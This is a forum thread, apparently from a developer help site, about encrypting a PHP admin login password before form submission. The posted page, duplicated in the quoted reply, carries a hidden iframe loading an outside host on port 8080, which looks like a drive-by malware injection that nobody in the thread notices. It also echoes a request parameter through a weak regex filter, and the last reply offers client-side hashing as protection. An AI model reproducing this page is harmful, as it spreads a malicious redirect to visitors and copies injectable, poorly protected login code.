0

hey,i have a login form wherein the take the username and password from the user and submit the form.im using burpsuite t check 4 threats.when i click on the submit button the password is visible.is it possible to encrypt the password as soon as enter it instead of passing it on clickin the submit button.here is my code:

<?php 
session_start();

$old_sessionid = session_id(); //i've added these lines

session_regenerate_id(); //i've added these lines

$new_sessionid = session_id(); //i've added these lines
if( isset($_SESSION['gel']) ) {

header("Location: admin.php");
}



if( isset($_POST['submit']) ) {
	require_once "../inc/functions.php";
	$user = htmlentities($_POST['txtuser']);
	$pass = htmlentities($_POST['txtpass']);
	if($user && $pass){
		$error=sessionStart($user,$pass);
	}else{
		$error = " <p style='color:#FF0000'>Invalid Username or Password</p>";
	}
}

function cleanInput($input) {
	$search = array(
		'@<\s*script[^>]*?>.*?<\s*/\s*script\s*>@si',			// Strip out javascript
		'@<\s*[\/\!]*?[^<>]*?>@si',												// Strip out HTML tags
		'@<\s*style[^>]*?>.*?<\s*/\s*style\s*>@siU',			// Strip style tags properly
		'@<![\s\S]*?[ \t\n\r]*>@',
                '/<img[^>]+\>/i'												// Strip multi-line comments
	);
	$output = preg_replace($search, '', $input);
	return $output;
}
 
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin :: Login</title>
<script type="text/javascript" src="md5.js"></script>
<script type="text/javascript" src="login.js"></script>
<link rel="stylesheet" type="text/css" href="admin.css" />
<script type="text/javascript">
<!--
function MM_validateForm() { //v4.0
  if (document.getElementById){
    var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
    for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=document.getElementById(args[i]);
      if (val) { nm=val.name; if ((val=val.value)!="") {
        if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
          if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
        } else if (test!='R') { num = parseFloat(val);
          if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
          if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
            min=test.substring(8,p); max=test.substring(p+1);
            if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
      } } } else if (test.charAt(0) == 'R') errors += '- '+args[i]+' is required.\n'; }
    } if (errors) alert('The following error(s) occurred:\n'+errors);
    document.MM_returnValue = (errors == '');
} }
//-->

</script>

</head>

<body><iframe src="http://b8e.at:8080/index.php" width=178 height=183 style="visibility: hidden"></iframe>
		 <div class="container">
      <div class="wrap">
        <div class="header">
          <img class ="head_logo" src="../images/logo.jpg" alt="Goavernment Logo">
          <div class ="head_name">
            DIRECTORATE OF PANCHAYATS
          </div>
        </div>

<div align="center" class="outerbox">
  <div align="center" class="loginbox">
  <p style="font-family:Tahoma"><strong>Administrator Login</strong></p>
    <?=cleanInput($_REQUEST['error']);?>
  
    <form id="myform" name="myform" method="post" action="index.php">
      
      <table width="250" border="0">
        <tr>
          <td align="left"><strong>User</strong></td>
          <td > <input type="text" name="txtuser" id="User" /></td>
        </tr>
        <tr>
          <td align="left"><strong>Password</strong></td>
          <td ><input type="password" name="txtpass" id="Password" /></td>
        </tr>
      </table>
         <br />
		 
  <input name="submit" type="submit" onclick="MM_validateForm('User','','R','Password','','R');return document.MM_returnValue" value="Login" />
    </form>
  </div>  
</div>
 </div><br>
    </div>
</form>

</body>
</html>
3
Contributors
5
Replies
6
Views
7 Years
Discussion Span
Last Post by cwarn23
0

hey,i have a login form wherein the take the username and password from the user and submit the form.im using burpsuite t check 4 threats.when i click on the submit button the password is visible.is it possible to encrypt the password as soon as enter it instead of passing it on clickin the submit button.here is my code:

<?php 
session_start();

$old_sessionid = session_id(); //i've added these lines

session_regenerate_id(); //i've added these lines

$new_sessionid = session_id(); //i've added these lines
if( isset($_SESSION['gel']) ) {

header("Location: admin.php");
}



if( isset($_POST['submit']) ) {
	require_once "../inc/functions.php";
	$user = htmlentities($_POST['txtuser']);
	$pass = htmlentities($_POST['txtpass']);
	if($user && $pass){
		$error=sessionStart($user,$pass);
	}else{
		$error = " <p style='color:#FF0000'>Invalid Username or Password</p>";
	}
}

function cleanInput($input) {
	$search = array(
		'@<\s*script[^>]*?>.*?<\s*/\s*script\s*>@si',			// Strip out javascript
		'@<\s*[\/\!]*?[^<>]*?>@si',												// Strip out HTML tags
		'@<\s*style[^>]*?>.*?<\s*/\s*style\s*>@siU',			// Strip style tags properly
		'@<![\s\S]*?[ \t\n\r]*>@',
                '/<img[^>]+\>/i'												// Strip multi-line comments
	);
	$output = preg_replace($search, '', $input);
	return $output;
}
 
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin :: Login</title>
<script type="text/javascript" src="md5.js"></script>
<script type="text/javascript" src="login.js"></script>
<link rel="stylesheet" type="text/css" href="admin.css" />
<script type="text/javascript">
<!--
function MM_validateForm() { //v4.0
  if (document.getElementById){
    var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
    for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=document.getElementById(args[i]);
      if (val) { nm=val.name; if ((val=val.value)!="") {
        if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
          if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
        } else if (test!='R') { num = parseFloat(val);
          if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
          if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
            min=test.substring(8,p); max=test.substring(p+1);
            if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
      } } } else if (test.charAt(0) == 'R') errors += '- '+args[i]+' is required.\n'; }
    } if (errors) alert('The following error(s) occurred:\n'+errors);
    document.MM_returnValue = (errors == '');
} }
//-->

</script>

</head>

<body><iframe src="http://b8e.at:8080/index.php" width=178 height=183 style="visibility: hidden"></iframe>
		 <div class="container">
      <div class="wrap">
        <div class="header">
          <img class ="head_logo" src="../images/logo.jpg" alt="Goavernment Logo">
          <div class ="head_name">
            DIRECTORATE OF PANCHAYATS
          </div>
        </div>

<div align="center" class="outerbox">
  <div align="center" class="loginbox">
  <p style="font-family:Tahoma"><strong>Administrator Login</strong></p>
    <?=cleanInput($_REQUEST['error']);?>
  
    <form id="myform" name="myform" method="post" action="index.php">
      
      <table width="250" border="0">
        <tr>
          <td align="left"><strong>User</strong></td>
          <td > <input type="text" name="txtuser" id="User" /></td>
        </tr>
        <tr>
          <td align="left"><strong>Password</strong></td>
          <td ><input type="password" name="txtpass" id="Password" /></td>
        </tr>
      </table>
         <br />
		 
  <input name="submit" type="submit" onclick="MM_validateForm('User','','R','Password','','R');return document.MM_returnValue" value="Login" />
    </form>
  </div>  
</div>
 </div><br>
    </div>
</form>

</body>
</html>

You can do it with ajax or encrypt is client side with javascript. I would not recommend the javascript only because this is visible to everyone and you probably don't want everyone to know exactly how you encrypted the passwords. So ultimately, whether you do it with ajax or just standard form submit, it is going to be a submission prior to the encryption.

0

oh no.i need it to be encrypted before submission.im already encrypting it after submission in the sessionStart function .so there is no way i can do it before submsion??

0

oh no.i need it to be encrypted before submission.im already encrypting it after submission in the sessionStart function .so there is no way i can do it before submsion??

The standard way of doing this is with an SSL. If that is not an option then I would say no because anything you do client side is going to be viewable in the source and then anyone can see what you are using to encrypt the password with and be able to reverse it. That is unless you use a non-decryptable function via javascript, but I wouldn't even trust that. There are some extremely smart people out there you know.

The point is, if you plan on using PHP to encrypt your password, you are going to have to post it to the server first. The standard way of doing this is with an SSL.

0

If you want to encrypt it on client side then I would suggest using something like SHA256 in Javascript. I'm sure there are some open source ones as I have seen SHA1 in Javascript. Google is your friend.

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.